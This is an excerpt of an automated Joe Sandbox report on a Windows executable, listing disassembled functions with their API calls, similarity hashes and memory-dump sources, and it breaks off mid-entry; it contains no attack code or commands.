                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                      • String ID:
                                                                                      • API String ID: 3203458085-0
                                                                                      • Opcode ID: 24e150dd72daa2498e62577c37e6f6b957bb80878c6c16947f8e459ffcc25412
                                                                                      • Instruction ID: c1880d1b6383e38a6bce40b2d17b69b16cfdae4079a4551d0e2533be3612491b
                                                                                      • Opcode Fuzzy Hash: 24e150dd72daa2498e62577c37e6f6b957bb80878c6c16947f8e459ffcc25412
                                                                                      • Instruction Fuzzy Hash: 4DB11531204341AFC724DF64C89AF6A77E5AF85318F58854CF8664B2E2DB31EE42DB91
                                                                                      Function 00C15D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?,?), ref: 00C15D30
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C15D71
                                                                                      • ScreenToClient.USER32(?,?), ref: 00C15D99
                                                                                      • GetClientRect.USER32(?,?), ref: 00C15ED7
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C15EF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                      • String ID:
                                                                                      • API String ID: 1296646539-0
                                                                                      • Opcode ID: c2096b0522782e0d5e3dc38332a6e9b3943c77f8a67c2ab60cab734128e3122b
                                                                                      • Instruction ID: 4171e58a5bca64fc30b6d54900d56ef02f72ccb2661aeaa7f932ddbed1129948
                                                                                      • Opcode Fuzzy Hash: c2096b0522782e0d5e3dc38332a6e9b3943c77f8a67c2ab60cab734128e3122b
                                                                                      • Instruction Fuzzy Hash: 15B17A78A00A4ADBDB14CFA9C4807EEB7F1FF49314F14841AE8A9D7250DB34AA91DB54
                                                                                      Function 00C401B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __allrem.LIBCMT ref: 00C400BA
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C400D6
                                                                                      • __allrem.LIBCMT ref: 00C400ED
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C4010B
                                                                                      • __allrem.LIBCMT ref: 00C40122
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C40140
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                      • String ID:
                                                                                      • API String ID: 1992179935-0
                                                                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                      • Instruction ID: 4aaa9a8cb4931cb10da43ef37dbc1045fbbbb4af3b7bf2fd7cc240c55ce71b94
                                                                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                      • Instruction Fuzzy Hash: 3F81F572A407069BE724AE69CC42B6F73E8BF55324F24493EFA21D7281E770DE419B50
                                                                                      Function 00C461FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C382D9,00C382D9,?,?,?,00C4644F,00000001,00000001,8BE85006), ref: 00C46258
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C4644F,00000001,00000001,8BE85006,?,?,?), ref: 00C462DE
                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C463D8
                                                                                      • __freea.LIBCMT ref: 00C463E5
                                                                                        • Part of subcall function 00C43820: RtlAllocateHeap.NTDLL(00000000,?,00CE1444,?,00C2FDF5,?,?,00C1A976,00000010,00CE1440,00C113FC,?,00C113C6,?,00C11129), ref: 00C43852
                                                                                      • __freea.LIBCMT ref: 00C463EE
                                                                                      • __freea.LIBCMT ref: 00C46413
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1414292761-0
                                                                                      • Opcode ID: 87545e721216235400a577f7e1301a8ac4174be23776b6df5a020829e1057a9c
                                                                                      • Instruction ID: b6a06c6f1ad50a1a51d698deab0a6b956828ddbd96378919e3391a7390e448c6
                                                                                      • Opcode Fuzzy Hash: 87545e721216235400a577f7e1301a8ac4174be23776b6df5a020829e1057a9c
                                                                                      • Instruction Fuzzy Hash: 55513172A00246ABEB258F60CC81FAF7BA9FF86710F144229FD15D7194EB34DD80D6A1
                                                                                      Function 00C9BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C9C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9B6AE,?,?), ref: 00C9C9B5
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9C9F1
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9CA68
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9CA9E
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9BCCA
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9BD25
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C9BD6A
                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C9BD99
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C9BDF3
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C9BDFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                      • String ID:
                                                                                      • API String ID: 1120388591-0
                                                                                      • Opcode ID: 180b43a65ef71935005c9e2200332411f62ae51c5587b29c68f8862d9261e2bb
                                                                                      • Instruction ID: 8e9162ebd7cdb521720f0711c43c29f0a23ed51e3f777543fb9ea2a563b647f6
                                                                                      • Opcode Fuzzy Hash: 180b43a65ef71935005c9e2200332411f62ae51c5587b29c68f8862d9261e2bb
                                                                                      • Instruction Fuzzy Hash: 2181D031208241EFCB14DF24C999E6ABBE5FF85308F14855CF4594B2A2CB31EE45DB92
                                                                                      Function 00C6F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000035), ref: 00C6F7B9
                                                                                      • SysAllocString.OLEAUT32(00000001), ref: 00C6F860
                                                                                      • VariantCopy.OLEAUT32(00C6FA64,00000000), ref: 00C6F889
                                                                                      • VariantClear.OLEAUT32(00C6FA64), ref: 00C6F8AD
                                                                                      • VariantCopy.OLEAUT32(00C6FA64,00000000), ref: 00C6F8B1
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C6F8BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                      • String ID:
                                                                                      • API String ID: 3859894641-0
                                                                                      • Opcode ID: ed45701fd8d7eb6db11649324cf5acd400160da1fd07afd06385340028e5b6ea
                                                                                      • Instruction ID: 49f5afa76cdfa036bfbe3a1507b3bd40fea39def0ff8917f78671f13755a3da0
                                                                                      • Opcode Fuzzy Hash: ed45701fd8d7eb6db11649324cf5acd400160da1fd07afd06385340028e5b6ea
                                                                                      • Instruction Fuzzy Hash: A551D835500310BADF30AF66E8D5769B3A5EF46310F24546EE906DF291DB708C42DB56
                                                                                      Function 00C8910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C17620: _wcslen.LIBCMT ref: 00C17625
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00C894E5
                                                                                      • _wcslen.LIBCMT ref: 00C89506
                                                                                      • _wcslen.LIBCMT ref: 00C8952D
                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00C89585
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                                      • String ID: X
                                                                                      • API String ID: 83654149-3081909835
                                                                                      • Opcode ID: 9f25ccc0b2646cc40a5a802d2febb649e4807fbf76c1fb78e63ebedcb62c110a
                                                                                      • Instruction ID: 5932d36935d422364efdd8f72eb566603453afed043c3fa6b7ad214a4132ffe8
                                                                                      • Opcode Fuzzy Hash: 9f25ccc0b2646cc40a5a802d2febb649e4807fbf76c1fb78e63ebedcb62c110a
                                                                                      • Instruction Fuzzy Hash: CCE1B3315043009FD714EF24C881AAEB7E4FF85318F08896DF8999B2A2DB30ED45DB96
                                                                                      Function 00C2920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      • BeginPaint.USER32(?,?,?), ref: 00C29241
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C292A5
                                                                                      • ScreenToClient.USER32(?,?), ref: 00C292C2
                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C292D3
                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00C29321
                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00C671EA
                                                                                        • Part of subcall function 00C29339: BeginPath.GDI32(00000000), ref: 00C29357
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                      • String ID:
                                                                                      • API String ID: 3050599898-0
                                                                                      • Opcode ID: 0d8f3ed64c7c804688e62e1ecfb4ac45deff12f4ef654225506753400823a1a9
                                                                                      • Instruction ID: 01c2724ca7703e05504bcc9e97a97e5b9f90bbdb30ed0202793cc30a4a9f332a
                                                                                      • Opcode Fuzzy Hash: 0d8f3ed64c7c804688e62e1ecfb4ac45deff12f4ef654225506753400823a1a9
                                                                                      • Instruction Fuzzy Hash: 1341AB71104310AFD720DF25ECC4FBE7BB8EB46724F040629F9A48B2A2C7309945DB61
                                                                                      Function 00C807EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C8080C
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C80847
                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00C80863
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00C808DC
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C808F3
                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C80921
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                      • String ID:
                                                                                      • API String ID: 3368777196-0
                                                                                      • Opcode ID: 4532a4b7d122e6130125e6681f84ff413ddaeab85f6e66a8755bc1e1b73d9967
                                                                                      • Instruction ID: 1419f58d7f9f3679ca31c99abf1284717b00d98ebdf3b89827a088d10fb2c6e0
                                                                                      • Opcode Fuzzy Hash: 4532a4b7d122e6130125e6681f84ff413ddaeab85f6e66a8755bc1e1b73d9967
                                                                                      • Instruction Fuzzy Hash: 5E414971A00205EBDF15AF54DC85BAA77B8FF05314F1440A9ED00AA297DB30DE65DBA4
                                                                                      Function 00CA81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C6F3AB,00000000,?,?,00000000,?,00C6682C,00000004,00000000,00000000), ref: 00CA824C
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00CA8272
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00CA82D1
                                                                                      • ShowWindow.USER32(00000000,00000004), ref: 00CA82E5
                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00CA830B
                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CA832F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 642888154-0
                                                                                      • Opcode ID: 7b252f1eeb07d65b67bec318d550a688ff15b4a398115e517b86dbdeb110d888
                                                                                      • Instruction ID: 52c879f6b0fd249c131c663b3bcf52fc590871c7d5ab008eb7f8b04e863e9b0e
                                                                                      • Opcode Fuzzy Hash: 7b252f1eeb07d65b67bec318d550a688ff15b4a398115e517b86dbdeb110d888
                                                                                      • Instruction Fuzzy Hash: F141B430601645EFDF15CF14D8D9BE87BE0BB0B718F184269EA584F272CB31A959CB50
                                                                                      Function 00C74C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00C74C95
                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C74CB2
                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C74CEA
                                                                                      • _wcslen.LIBCMT ref: 00C74D08
                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C74D10
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C74D1A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                      • String ID:
                                                                                      • API String ID: 72514467-0
                                                                                      • Opcode ID: 77350b46c92aa043222f993083f89480aa5e9c1cacd3205bf116d5f381988db6
                                                                                      • Instruction ID: 22404f61c250ac3c2063e47f742473ae5b922a5d56b8bb9b0b30f27d4f3deb1c
                                                                                      • Opcode Fuzzy Hash: 77350b46c92aa043222f993083f89480aa5e9c1cacd3205bf116d5f381988db6
                                                                                      • Instruction Fuzzy Hash: FB21C531204214BBEB2A9B69EC49B7F7BACDF56750F108079F809CA191EB61DD0196A0
                                                                                      Function 00C8581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C13A97,?,?,00C12E7F,?,?,?,00000000), ref: 00C13AC2
                                                                                      • _wcslen.LIBCMT ref: 00C8587B
                                                                                      • CoInitialize.OLE32(00000000), ref: 00C85995
                                                                                      • CoCreateInstance.OLE32(00CAFCF8,00000000,00000001,00CAFB68,?), ref: 00C859AE
                                                                                      • CoUninitialize.OLE32 ref: 00C859CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 3172280962-24824748
                                                                                      • Opcode ID: 1335c8db8c1ed59da8d3c6dffb95129b84518ccae4f059818156468278ea732c
                                                                                      • Instruction ID: f81c3b16c5cab0a4a08d6f8ca8910ae4907bdc8282679ecbbecca69c8cdf438d
                                                                                      • Opcode Fuzzy Hash: 1335c8db8c1ed59da8d3c6dffb95129b84518ccae4f059818156468278ea732c
                                                                                      • Instruction Fuzzy Hash: 26D174706047019FC704EF24C480A6ABBF2EF8A318F14495DF8999B361D771ED46DB92
                                                                                      Function 00C7175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C70FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C70FCA
                                                                                        • Part of subcall function 00C70FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C70FD6
                                                                                        • Part of subcall function 00C70FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C70FE5
                                                                                        • Part of subcall function 00C70FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C70FEC
                                                                                        • Part of subcall function 00C70FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C71002
                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00C71335), ref: 00C717AE
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C717BA
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C717C1
                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C717DA
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00C71335), ref: 00C717EE
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C717F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                      • String ID:
                                                                                      • API String ID: 3008561057-0
                                                                                      • Opcode ID: 3551a6d869463f3ca03929be5cc3c5b556457d6ef96166a7a87e0176d41a6c34
                                                                                      • Instruction ID: e37089d4a2e2c42f9d9eabcde80b4b65caad4b31ab93cf2d1cddc64a73d041a7
                                                                                      • Opcode Fuzzy Hash: 3551a6d869463f3ca03929be5cc3c5b556457d6ef96166a7a87e0176d41a6c34
                                                                                      • Instruction Fuzzy Hash: 99118E71600205FFDB189FA8CC89BAE7BADEB46359F188018F95597210D735AA44CB60
                                                                                      Function 00C714CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C714FF
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00C71506
                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C71515
                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00C71520
                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C7154F
                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C71563
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
